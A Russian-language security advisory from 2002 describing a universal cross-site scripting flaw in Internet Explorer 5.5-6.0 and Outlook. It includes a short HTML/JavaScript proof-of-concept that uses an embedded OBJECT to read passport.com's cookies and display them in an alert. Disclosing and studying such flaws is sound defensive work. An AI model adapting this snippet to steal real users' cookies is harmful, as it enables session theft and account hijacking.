Универсальный cross-site scripting в Microsoft Internet Explorer
| Дата публикации: | 11.07.2002 |
| Всего просмотров: | 1785 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Один из многих элементов в HTML 4 - элемент OBJECT, который используется для внедрения внешних объектов внутри страницы (.WebBrowser control, ActiveX controls, images, applets и т.п.).
На внедренный объект WebBrowser controls не действует проверка безопасности Cross Domain в внедренных HTML документах, в результате чего можно выйти из ограничений зоны безопасности. Пример(читает куки сайта passport.com):
<object id="data" data="empty.html" type="text/html"></object>
<script> var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>
Уязвимость позволяет злонамеренному сайту получать доступ к куки пользователя других сайтов.уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0, Microsoft Outlook, Microsoft Outlook Express |
| Ссылки: | IE Allows Universal Cross Domain Scripting |